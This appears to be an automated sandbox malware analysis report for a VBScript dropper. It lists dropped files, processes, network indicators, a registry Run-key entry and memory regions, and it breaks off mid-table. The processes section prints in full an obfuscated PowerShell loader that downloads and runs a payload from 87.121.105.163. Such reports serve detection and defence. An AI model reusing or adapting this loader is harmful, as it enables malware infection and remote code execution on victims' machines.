Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Pedido02304024.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_255zdkf4.knj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5irav4cj.1zm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qtasa01.5ge.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lystk3et.uuf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\s5497I81
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\Roaming\ceilometers.Pri
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function
ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne
-lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function
Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC
NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner
'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p
cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt
-BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner
',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t
eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe
g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t
( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe
rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe
rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr
e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds
(ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds
(ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t
-TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP)
') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv
eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt
e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i
nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds
(ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t
aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb
sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function
ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne
-lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function
Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC
NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner
'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p
cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt
-BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner
',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t
eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe
g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t
( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe
rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe
rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr
e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds
(ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds
(ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t
-TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP)
') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv
eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt
e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i
nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds
(ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t
aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb
sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
|
"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"
|
||
C:\Windows\SysWOW64\AtBroker.exe
|
"C:\Windows\SysWOW64\AtBroker.exe"
|
||
C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
|
"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
|
||
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 4 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://www.theplays.shop/gnbc/
|
172.67.152.117
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.theplays.shop/gnbc/?qRm=CFA+HkVxdb5EmOTiyKOWRwF+pLrZo+HX//sAjaoe71zU1jru2C8H4zHuCGW9CrkOmabuxLOltM6mSwZ40cUWhJKDDEbSgCXb2jOP4Eqmg9UuBFGRNSISgVk=&ALLPg=JbKtchOp7P4H8n8
|
172.67.152.117
|
||
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
|
unknown
|
||
http://www.e-me.lv/repository0
|
unknown
|
||
http://www.acabogacia.org/doc0
|
unknown
|
||
http://crl.chambersign.org/chambersroot.crl0
|
unknown
|
||
http://ocsp.suscerte.gob.ve0
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
http://www.postsignum.cz/crl/psrootqca2.crl02
|
unknown
|
||
http://crl.dhimyotis.com/certignarootca.crl0
|
unknown
|
||
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
|
unknown
|
||
http://www.chambersign.org1
|
unknown
|
||
http://www.pkioverheid.nl/policies/root-policy0
|
unknown
|
||
http://87.121.105.163/Boldklubbens.pczP
|
unknown
|
||
http://repository.swisssign.com/0
|
unknown
|
||
http://www.suscerte.gob.ve/lcr0#
|
unknown
|
||
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
|
unknown
|
||
http://crl.ssc.lt/root-c/cacrl.crl0
|
unknown
|
||
http://postsignum.ttc.cz/crl/psrootqca2.crl0
|
unknown
|
||
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
|
unknown
|
||
http://ca.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
|
unknown
|
||
http://www.certplus.com/CRL/class3P.crl0
|
unknown
|
||
http://www.suscerte.gob.ve/dpc0
|
unknown
|
||
http://www.certeurope.fr/reference/root2.crl0
|
unknown
|
||
http://www.certplus.com/CRL/class2.crl0
|
unknown
|
||
http://www.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
http://www.defence.gov.au/pki0
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.sk.ee/cps/0
|
unknown
|
||
http://www.globaltrust.info0=
|
unknown
|
||
http://www.anf.es
|
unknown
|
||
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://crl.postsignum.cz/crl/psrootqca4.crl02
|
unknown
|
||
http://pki.registradores.org/normativa/index.htm0
|
unknown
|
||
http://policy.camerfirma.com0
|
unknown
|
||
http://www.ssc.lt/cps03
|
unknown
|
||
http://ocsp.pki.gva.es0
|
unknown
|
||
http://www.anf.es/es/address-direccion.html
|
unknown
|
||
https://www.anf.es/address/)1(0&
|
unknown
|
||
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
|
unknown
|
||
http://ca.mtin.es/mtin/ocsp0
|
unknown
|
||
http://crl.ssc.lt/root-b/cacrl.crl0
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
|
unknown
|
||
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
|
unknown
|
||
http://www.certicamara.com/dpc/0Z
|
unknown
|
||
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://wwww.certigna.fr/autorites/0m
|
unknown
|
||
http://www.dnie.es/dpc0
|
unknown
|
||
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://87.121.105.163
|
unknown
|
||
http://ca.mtin.es/mtin/DPCyPoliticas0
|
unknown
|
||
https://www.anf.es/AC/ANFServerCA.crl0
|
unknown
|
||
https://repository.tsp.zetes.com0
|
unknown
|
||
http://www.globaltrust.info0
|
unknown
|
||
http://certificates.starfieldtech.com/repository/1604
|
unknown
|
||
http://acedicom.edicomgroup.com/doc0
|
unknown
|
||
http://www.certplus.com/CRL/class3TS.crl0
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://crl.anf.es/AC/ANFServerCA.crl0
|
unknown
|
||
http://www.certeurope.fr/reference/pc-root2.pdf0
|
unknown
|
||
http://ac.economia.gob.mx/last.crl0G
|
unknown
|
||
https://www.catcert.net/verarrel
|
unknown
|
||
http://www.disig.sk/ca0f
|
unknown
|
||
http://87.121.105.163/fBizb192.bin
|
87.121.105.163
|
||
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
|
unknown
|
||
http://www.e-szigno.hu/RootCA.crl
|
unknown
|
||
http://www.sk.ee/juur/crl/0
|
unknown
|
||
http://crl.chambersign.org/chambersignroot.crl0
|
unknown
|
||
http://crl.xrampsecurity.com/XGCA.crl0
|
unknown
|
||
http://certs.oati.net/repository/OATICA2.crl0
|
unknown
|
||
http://crl.oces.trust2408.com/oces.crl0
|
unknown
|
||
http://www.quovadis.bm0
|
unknown
|
||
http://crl.ssc.lt/root-a/cacrl.crl0
|
unknown
|
||
http://certs.oaticerts.com/repository/OATICA2.crl
|
unknown
|
||
http://certs.oati.net/repository/OATICA2.crt0
|
unknown
|
||
http://www.accv.es00
|
unknown
|
||
http://www.pkioverheid.nl/policies/root-policy-G20
|
unknown
|
||
https://www.netlock.net/docs
|
unknown
|
||
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
|
unknown
|
||
http://www.e-trust.be/CPS/QNcerts
|
unknown
|
||
http://ocsp.ncdc.gov.sa0
|
unknown
|
||
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
|
unknown
|
||
http://crl2.postsignum.cz/crl/psrootqca4.crl01
|
unknown
|
||
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
|
unknown
|
||
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
|
unknown
|
||
http://www.datev.de/zertifikat-policy-int0
|
unknown
|
||
https://d.symc0
|
unknown
|
||
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
|
unknown
|
||
https://repository.luxtrust.lu0
|
unknown
|
||
http://cps.chambersign.org/cps/chambersroot.html0
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.acabogacia.org0
|
unknown
|
||
http://www.firmaprofesional.com/cps0
|
unknown
|
||
http://www.uce.gub.uy/acrn/acrn.crl0
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
www.tyaer.com
|
47.91.88.207
|
||
www.theplays.shop
|
172.67.152.117
|
||
www.megabet303.lol
|
unknown
|
||
www.oyoing.com
|
127.0.0.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.67.152.117
|
www.theplays.shop
|
United States
|
||
47.91.88.207
|
www.tyaer.com
|
United States
|
||
87.121.105.163
|
unknown
|
Bulgaria
|
||
127.0.0.1
|
www.oyoing.com
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
UX0H5LZH3DGH
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 10 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
62A7000
|
trusted library allocation
|
page read and write
|
||
23700000
|
unclassified section
|
page execute and read and write
|
||
2ED0000
|
system
|
page execute and read and write
|
||
8E80000
|
direct allocation
|
page execute and read and write
|
||
860000
|
trusted library allocation
|
page read and write
|
||
AC33000
|
direct allocation
|
page execute and read and write
|
||
DA0000
|
trusted library allocation
|
page read and write
|
||
600000
|
system
|
page execute and read and write
|
||
2C00000
|
unkown
|
page execute and read and write
|
||
24A90076000
|
trusted library allocation
|
page read and write
|
||
4C0000
|
system
|
page execute and read and write
|
||
79DE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
141000
|
unkown
|
page readonly
|
||
2200000
|
unkown
|
page execute and read and write
|
||
1BF5C450000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AD0CF000
|
heap
|
page read and write
|
||
518F000
|
stack
|
page read and write
|
||
613000
|
heap
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
279AEE23000
|
heap
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
22651000
|
heap
|
page read and write
|
||
7F8000
|
heap
|
page read and write
|
||
24AEAD40000
|
heap
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
279AEDB2000
|
heap
|
page read and write
|
||
6EB0000
|
heap
|
page readonly
|
||
24AEAAF1000
|
heap
|
page read and write
|
||
45B000
|
stack
|
page read and write
|
||
279AD012000
|
heap
|
page read and write
|
||
2C92000
|
heap
|
page read and write
|
||
6D8787E000
|
stack
|
page read and write
|
||
279AEF23000
|
heap
|
page read and write
|
||
279AEDE6000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
DE0000
|
trusted library allocation
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
6EAF000
|
stack
|
page read and write
|
||
6ED0000
|
direct allocation
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
4EE0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6F98000
|
heap
|
page read and write
|
||
279AEDEE000
|
heap
|
page read and write
|
||
21F00000
|
direct allocation
|
page read and write
|
||
6E7000
|
heap
|
page read and write
|
||
279AEDF6000
|
heap
|
page read and write
|
||
279AEFA3000
|
heap
|
page read and write
|
||
6553000
|
remote allocation
|
page execute and read and write
|
||
3170000
|
heap
|
page read and write
|
||
785E000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
8F80000
|
direct allocation
|
page read and write
|
||
5D0000
|
unkown
|
page read and write
|
||
2110000
|
unkown
|
page readonly
|
||
279AD0A1000
|
heap
|
page read and write
|
||
279AD0AB000
|
heap
|
page read and write
|
||
775B000
|
stack
|
page read and write
|
||
3530000
|
heap
|
page read and write
|
||
8A40000
|
trusted library allocation
|
page read and write
|
||
279AF07B000
|
heap
|
page read and write
|
||
348F000
|
unkown
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2D75000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A809DD000
|
trusted library allocation
|
page read and write
|
||
151000
|
unkown
|
page execute read
|
||
8F60000
|
direct allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2DED000
|
stack
|
page read and write
|
||
24AECC29000
|
heap
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
D8D37FF000
|
stack
|
page read and write
|
||
279AF084000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEE03000
|
heap
|
page read and write
|
||
24A814EF000
|
trusted library allocation
|
page read and write
|
||
24AECC39000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
21F30000
|
direct allocation
|
page read and write
|
||
1BA000
|
stack
|
page read and write
|
||
24AEC477000
|
heap
|
page execute and read and write
|
||
279AF064000
|
heap
|
page read and write
|
||
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
2DF5000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7CE0000
|
trusted library allocation
|
page read and write
|
||
6D8757E000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7EE0000
|
trusted library allocation
|
page read and write
|
||
279AEF6D000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279ACFE0000
|
heap
|
page read and write
|
||
6001000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2979000
|
stack
|
page read and write
|
||
1BF5DDC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
24A80224000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
210F000
|
stack
|
page read and write
|
||
4842000
|
unclassified section
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4B6E000
|
stack
|
page read and write
|
||
279ACFC0000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
78C0000
|
heap
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
279AF1B2000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
25BF1000
|
unclassified section
|
page execute and read and write
|
||
6E1000
|
heap
|
page read and write
|
||
4EBE000
|
stack
|
page read and write
|
||
344E000
|
stack
|
page read and write
|
||
35E1000
|
heap
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
24AEC5C0000
